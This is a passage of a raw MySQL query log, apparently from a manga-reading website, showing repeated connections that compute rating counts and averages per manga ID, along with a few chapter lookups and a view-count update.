FROM ratings where manga_id = '59' order by created desc 330650876 Quit 330650877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330650877 Quit 330650878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330650878 Quit 330650879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330650879 Quit 330650880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330650880 Quit 330650881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330650881 Quit 330650882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330650882 Quit 330650883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330650883 Quit 330650884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330650884 Quit 330650885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330650885 Quit 330650886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330650886 Quit 330650887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330650887 Quit 330650888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330650888 Quit 330650889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330650889 Quit 330650890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330650890 Quit 330650891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330650891 Quit 330650892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330650892 Quit 330650893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330650893 Quit 330650894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330650894 Quit 330650895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330650895 Quit 330650896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330650896 Quit 330650897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330650897 Quit 330650898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330650898 Quit 330650899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330650899 Quit 330650900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330650900 Quit 330650901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330650901 Quit 330650902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330650902 Quit 330650903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330650903 Quit 330650904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330650904 Quit 330650905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330650905 Quit 330650906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330650906 Quit 330650907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330650907 Quit 330650908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330650908 Quit 330650909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330650909 Quit 330650910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330650910 Quit 330650911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330650911 Quit 330650912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330650912 Quit 330650913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330650913 Quit 330650914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330650914 Quit 330650915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330650915 Quit 330650916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330650916 Quit 330650917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330650917 Quit 330650918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330650918 Quit 330650919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330650919 Quit 330650920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330650920 Quit 330650921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330650921 Quit 330650922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330650922 Quit 330650923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330650923 Quit 330650924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330650924 Quit 330650925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330650925 Quit 330650926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330650926 Quit 330650927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330650927 Quit 330650928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330650928 Quit 330650929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330650929 Quit 330650930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330650930 Quit 330650931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330650931 Quit 330650932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330650932 Quit 330650933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330650933 Quit 330650934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330650934 Quit 330650935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330650935 Quit 330650936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330650936 Quit 330650937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330650937 Quit 330650938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330650938 Quit 330650939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330650939 Quit 330650940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330650940 Quit 330650941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330650941 Quit 330650942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330650942 Quit 330650943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330650943 Quit 330650944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330650944 Quit 330650945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330650945 Quit 330650946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330650946 Quit 330650947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330650947 Quit 330650948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330650948 Quit 330650949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330650949 Quit 330650950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330650950 Quit 330650951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330650951 Quit 330650952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330650952 Quit 330650953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330650953 Quit 330650954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330650954 Quit 330650955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330650955 Quit 330650956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330650956 Quit 330650957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330650957 Quit 330650958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330650958 Quit 330650959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330650959 Quit 330650960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330650960 Quit 330650961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330650961 Quit 330650962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330650962 Quit 330650963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330650963 Quit 330650964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330650964 Quit 330650965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330650965 Quit 330650966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330650966 Quit 330650967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330650967 Quit 330650968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330650968 Quit 330650969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330650969 Quit 330650970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330650970 Quit 330650971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330650971 Quit 330650972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330650972 Quit 330650973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330650973 Quit 330650974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330650974 Quit 330650975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330650975 Quit 330650976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330650976 Quit 330650977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330650977 Quit 330650978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330650978 Quit 330650979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330650979 Quit 330650980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330650980 Quit 330650981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330650981 Quit 330650982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330650982 Quit 330650983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330650983 Quit 330650984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330650984 Quit 330650985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330650985 Quit 330650986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330650986 Quit 330650987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330650987 Quit 330650988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330650988 Quit 330650989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330650989 Quit 330650990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330650990 Quit 330650991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330650991 Quit 330650992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330650992 Quit 330650993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330650993 Quit 330650994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330650994 Quit 330650995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330650995 Quit 330650996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330650996 Quit 330650997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330650997 Quit 330650998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330650998 Quit 330650999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330650999 Quit 330651000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330651000 Quit 330651001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330651001 Quit 330651002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330651002 Quit 330651003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330651003 Quit 330651004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330651004 Quit 330651005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330651005 Quit 330651006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330651006 Quit 330651007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330651007 Quit 330651008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330651008 Quit 330651009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330651009 Quit 330651010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330651010 Quit 330651011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330651011 Quit 330651012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330651012 Quit 330651013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330651013 Quit 330651014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330651014 Quit 330651015 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330651017 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651016 Quit 330651015 Quit 330651017 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12724' 330651018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330651018 Quit 330651019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651017 Quit 330651019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330651019 Quit 330651020 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651020 Query select * FROM chapters where id = '12724' 330651021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330651021 Quit 330651020 Quit 330651022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651023 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330651023 Query select * FROM chapters where manga_id = '193' order by id desc 330651022 Quit 330651024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330651024 Quit 330651025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651023 Quit 330651025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330651025 Quit 330651026 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651026 Query Update chapters set view=view+1 where id = '12724' 330651027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330651027 Quit 330651028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330651026 Quit 330651028 Quit 330651029 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651029 Query select * FROM chapters where id = '12724' 330651030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330651030 Quit 330651031 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651031 Query select 